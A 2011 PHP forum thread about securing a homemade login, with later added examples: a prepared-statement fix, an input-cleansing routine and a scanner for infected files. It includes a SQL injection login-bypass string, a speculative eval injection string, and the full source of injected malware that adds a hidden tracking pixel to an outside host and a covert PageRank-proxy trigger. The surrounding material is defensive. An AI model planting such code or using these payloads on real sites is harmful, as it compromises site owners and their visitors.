The Cache: Technology Expert's Forum
 
Author Topic: where are we at with that?  (Read 2664 times)
Phaėton (Lifer, 555 posts) « on: June 12, 2011, 11:11:49 AM »

Them: What have you done thus far?Huh?

(notice the arrogant extra question marks)

Me(under breath) Well mostly just report to bi-hourly status updates
to a force of distraction from you clods, much worse than a newborn puppy.

Me(above breath): I have a bug im trying to track down.


Them:  Can you post to the site what you have done so i can see your progress?

(me:)




[attachment: progress.JPG (122.66 KB, 1024x600)]

When I was your age we used to walk to the TV to change the channel....  _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
Phaėton (Lifer, 555 posts) « Reply #1 on: June 12, 2011, 11:13:04 AM »

ME: this should shut them up for a while.


 ROFLMAO ROFLMAO ROFLMAO ROFLMAO ROFLMAO
perkiset (Olde World Hacker, Administrator, Lifer, 10096 posts) « Reply #2 on: June 12, 2011, 11:57:02 AM »

(me, looking at Phaeton's code): unless that's proto code you might want to do a little more cleansing, because there look to be several vectors left open in there ...

It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
Phaėton (Lifer, 555 posts) « Reply #3 on: June 12, 2011, 12:21:01 PM »

do tell, perkiset?


btw I fixed that error for them and now I'm dealing with this one:

we've got fatal errors on line 10692 and more time to not answer questions.. (lol)

but I just did a bunch of code pasted together in random order... were you talking
about the passwordsubmitted / ghetto login stuff, cause that actually is something
else I'm dicking with .... do tell... vectors?


[attachment: fatalerror.JPG (10.39 KB, 938x76)]
perkiset (Olde World Hacker, Administrator, Lifer, 10096 posts) « Reply #4 on: June 12, 2011, 03:12:02 PM »

submit a password of
' or 1 or '

(with apostrophes)

many ways to maneuver that one, make sure that there's no way people can send you controlling characters.

try
$_POST['thePassword'] = preg_replace('/[^A-Z0-9\-_\.]/i', '', $_POST['thePassword']);

that's a quick and dirty squasher that will make sure that nothing except characters you expect comes through fields like that.

For numerics, my personal favorite is

$_POST['numVal'] = $_POST['numVal'] - 0;

Phaėton (Lifer, 555 posts) « Reply #5 on: June 12, 2011, 04:35:39 PM »

Quote from: perkiset on June 12, 2011, 03:12:02 PM

submit a password of
' or 1 or '

(with apostrophes)

many ways to maneuver that one, make sure that there's no way people can send you controlling characters.

try
$_POST['thePassword'] = preg_replace('/[^A-Z0-9\-_\.]/i', '', $_POST['thePassword']);

that's a quick and dirty squasher that will make sure that nothing except characters you expect comes through fields like that.

For numerics, my personal favorite is

$_POST['numVal'] = $_POST['numVal'] - 0;




I'm guessing you pass the whole $_POST off for cleaning to a routine!


I like the 'numval-0'  very nice!

so let's say I just leave it without stripping all but allowable characters..

what could someone do by sending me control characters? send like a '; eval('file_get_contents('worlddom.php');
as a post var?

or something like that?


perkiset (Olde World Hacker, Administrator, Lifer, 10096 posts) « Reply #6 on: June 12, 2011, 11:42:18 PM »

That would represent a larger hole and I've not toyed with that. I was targeting DB injections actually.

Yes, I often set up a cleansing routine if I have a lot of input I need from the user. I'll often cleanse it in JS first, then look for dodgy chars. If they are there, then I am 100% certain that the post was programmatically sent and most likely, by one of my, ahem, buddies here ;) I'd rather put the normal work of char cleansing out at the client so I don't even need to burden my servers with it. But I double up when it's arrived anyway.

BTW real geeks would've said
$_POST['numVal'] -= 0;
because it compiles tighter. I remember that syntax when working real arithmetic, but just always seem to forget it in simple cleansers.
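As an added example (written for this thread, not code posted in it): the login query that perkiset's `' or 1 or '` is aimed at, shown in its injectable form beside a prepared-statement version, followed by the kind of whole-$_POST cleansing routine Phaėton guesses at. The routine applies the thread's whitelist squasher and `- 0` coercion and also returns a flag for "something had to be stripped", which is the programmatically-sent signal perkiset describes. The `users` table, the `password_hash` column, the `$pdo` connection and all function names are assumptions; only the field names `thePassword` and `numVal` and the two one-liners come from the thread.

```php
<?php
// Added example, not the thread's code. Assumed schema: table `users`
// with columns `username` and `password_hash`; $pdo is an open PDO handle.

// BEFORE: the submitted value is spliced into the SQL text, so a password of
//   ' or 1 or '
// turns the WHERE clause into  password='' or 1 or ''  and every row matches.
function findUserVulnerable(PDO $pdo, string $user, string $pass): ?array
{
    $sql = "SELECT * FROM users WHERE username='$user' AND password='$pass'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// AFTER: placeholders keep user data out of the statement text entirely, and
// the password is checked against a stored hash rather than a plaintext column.
function findUserHardened(PDO $pdo, string $user, string $pass): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return null;
    }
    return $row;
}

// The thread's whitelist squasher: keep only the characters you expect.
function squash(string $value): string
{
    return preg_replace('/[^A-Z0-9\-_\.]/i', '', $value);
}

// Cleanse a whole request array. Returns [cleaned copy, dodgy flag]; the flag
// is true when anything had to be stripped. A browser running the client-side
// cleanser would never send such characters, so a true flag means the request
// was built by a program.
function cleanseRequest(array $input, array $numericFields = []): array
{
    $clean = [];
    $dodgy = false;
    foreach ($input as $key => $value) {
        if (!is_string($value)) {
            $dodgy = true;           // nested arrays are never expected from a form
            continue;
        }
        if (in_array($key, $numericFields, true)) {
            // The thread's "- 0" trick coerces a numeric string to int/float.
            // On PHP 8 a wholly non-numeric string in arithmetic throws a
            // TypeError, so guard it with is_numeric() and treat that as dodgy.
            $isNum = is_numeric($value);
            $clean[$key] = $isNum ? $value - 0 : 0;
            $dodgy = $dodgy || !$isNum;
            continue;
        }
        $squashed = squash($value);
        $dodgy = $dodgy || ($squashed !== $value);
        $clean[$key] = $squashed;
    }
    return [$clean, $dodgy];
}

// Constructed sample request, as a hostile client would send it.
$sample = ['thePassword' => "' or 1 or '", 'numVal' => '42abc'];
[$clean, $dodgy] = cleanseRequest($sample, ['numVal']);
var_dump($clean);   // thePassword => "or1or", numVal => 0
var_dump($dodgy);   // bool(true): apostrophes/spaces stripped, numVal not numeric
```

The squasher alone does not make the vulnerable query safe in general (it only happens to remove the quote character); the prepared statement is what removes the injection, and the squasher is then an input-validation layer and a bot detector on top of it.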
Phaėton (Lifer, 555 posts) « Reply #7 on: June 29, 2011, 12:59:25 PM »

oh so that's what probably happened here, where someone put this crap
in every php file, even my backups:

Code:
```php
<?php
//{{126104ed

GLOBAL $alreadyxxx;
if ($alreadyxxx != 1)
{
    $alreadyxxx = 1;

    // Silence errors so the injected code fails without a trace.
    $olderrxxx = error_reporting(0);

    // Output-buffer callback: inserts a hidden SPAN with a zero-size tracking
    // image just before </body> on every page the infected file serves.
    function outputxxx_callback($str)
    {
        $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
        preg_match("|</body>|si", $str, $arr);
        return str_replace($arr[0], $links . $arr[0], $str);
    }

    // The three functions below are the well-known Google toolbar PageRank
    // checksum; the operators were lost in extraction and are restored here.
    function StrToNum($Str, $Check, $Magic)
    {
        $Int32Unit = 4294967296;
        $length = strlen($Str);
        for ($i = 0; $i < $length; $i++) {
            $Check *= $Magic;
            if ($Check >= $Int32Unit) {
                $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
                $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
            }
            $Check += ord($Str[$i]);   // original used $Str{$i}, removed in PHP 8
        }
        return $Check;
    }

    function HashURL($String)
    {
        $Check1 = StrToNum($String, 0x1505, 0x21);
        $Check2 = StrToNum($String, 0, 0x1003F);

        $Check1 >>= 2;
        $Check1 = (($Check1 >> 4) & 0x3FFFFC0) | ($Check1 & 0x3F);
        $Check1 = (($Check1 >> 4) & 0x3FFC00) | ($Check1 & 0x3FF);
        $Check1 = (($Check1 >> 4) & 0x3C000) | ($Check1 & 0x3FFF);

        $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) << 2) | ($Check2 & 0xF0F);
        $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000);

        return ($T1 | $T2);
    }

    function CheckHash($Hashnum)
    {
        $CheckByte = 0;
        $Flag = 0;

        $HashStr = sprintf('%u', $Hashnum);
        $length = strlen($HashStr);

        for ($i = $length - 1; $i >= 0; $i--) {
            $Re = $HashStr[$i];
            if (1 === ($Flag % 2)) {
                $Re += $Re;
                $Re = (int)($Re / 10) + ($Re % 10);
            }
            $CheckByte += $Re;
            $Flag++;
        }

        $CheckByte %= 10;
        if (0 !== $CheckByte) {
            $CheckByte = 10 - $CheckByte;
            if (1 === ($Flag % 2)) {
                if (1 === ($CheckByte % 2)) {
                    $CheckByte += 9;
                }
                $CheckByte >>= 1;
            }
        }

        return '7' . $CheckByte . $HashStr;
    }

    // Fetches the PageRank of $url through the toolbar endpoint: the infected
    // host is being used as a proxy for someone else's rank-checking.
    function getpr($url)
    {
        $ch = CheckHash(HashURL($url));
        $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";
        $data = file_get_contents($file);
        $pos = strpos($data, "Rank_");
        if ($pos === false) {
            return -1;
        } else {
            $pr = substr($data, $pos + 9);
            $pr = trim($pr);
            $pr = str_replace("\n", '', $pr);
            return $pr;
        }
    }

    // Trigger: a POST with the secret field name turns any infected page into
    // the rank-lookup service; every other request gets the hidden pixel.
    if (isset($_POST['xxxprch']))
    {
        echo getpr($_POST['xxxprch']);
        exit();
    }
    else
        ob_start('outputxxx_callback');

    error_reporting($olderrxxx);
}

//}}861921ab
```
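Added example, not from the thread: a small PHP scanner that walks a web root and flags files carrying the traits of the injected block above (the `//{{` marker comment, the `ob_start()` callback hook, the `$_POST['xxxprch']` trigger, the hidden SPAN pixel and `error_reporting(0)`), which is how you find every infected copy, backups included, rather than the one you happened to open. The indicator patterns, the two-hit threshold and the constructed sample files are my assumptions, not anything the thread specifies.

```php
<?php
// Added example (hypothetical scanner, not the thread's code). Indicators are
// derived from the injected sample posted above; tune them for your own case.
const INDICATORS = [
    'marker comment'     => '~//\{\{[0-9a-f]{8}~',
    'output-buffer hook' => '~\bob_start\s*\(\s*[\'"]\w*xxx\w*[\'"]~',
    'hidden span pixel'  => '~visibility:\s*hidden.*?<img\s+width=0\s+height=0~is',
    'POST trigger'       => '~\$_POST\[[\'"]xxxprch[\'"]\]~',
    'error suppression'  => '~error_reporting\s*\(\s*0\s*\)~',
];

// Return the names of every indicator that matches the file's source.
function scanFile(string $path): array
{
    $src = file_get_contents($path);
    if ($src === false) {
        return [];
    }
    $hits = [];
    foreach (INDICATORS as $name => $re) {
        if (preg_match($re, $src)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Walk $root recursively; report .php files with two or more indicators.
// A single hit (error_reporting(0) on its own, say) is common in clean code,
// so the threshold keeps the report to files that look like the sample.
function scanTree(string $root): array
{
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $hits = scanFile($file->getPathname());
        if (count($hits) >= 2) {
            $report[$file->getPathname()] = $hits;
        }
    }
    return $report;
}

// Demo on a constructed tree: one file mimicking the sample, one clean file.
$root = sys_get_temp_dir() . '/scan_demo_' . getmypid();
mkdir($root);
file_put_contents("$root/index.php",
    "<?php\n//{{126104ed\nerror_reporting(0);\n"
    . "if(isset(\$_POST['xxxprch'])){exit();} else ob_start('outputxxx_callback');\n");
file_put_contents("$root/clean.php", "<?php\necho 'hello';\n");

print_r(scanTree($root));   // index.php listed with four indicators, clean.php absent

foreach (["$root/index.php", "$root/clean.php"] as $f) {
    unlink($f);
}
rmdir($root);
```

Run it against the real document root and the backup directory; a file that matches is a copy to restore from a known-good source, and the marker comment's hex tag is a cheap grep key for the same infection on other hosts.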
nutballs (Administrator, Lifer, 5627 posts, "Back in my day we had 9 planets") « Reply #8 on: June 29, 2011, 03:53:23 PM »

Err wtf is >>=
I must really be stuck in verbosity land.

I could eat a bowl of Alphabet Soup and shit a better argument than that.
perkiset (Olde World Hacker, Administrator, Lifer, 10096 posts) « Reply #9 on: June 29, 2011, 11:23:00 PM »

bitwise shift right + the PHP assign-to operator.

Much like +=, but >>= is "shift equals".

nutballs (Administrator, Lifer, 5627 posts, "Back in my day we had 9 planets") « Reply #10 on: June 30, 2011, 07:32:36 AM »

Oh yea. That ancient mystery of code.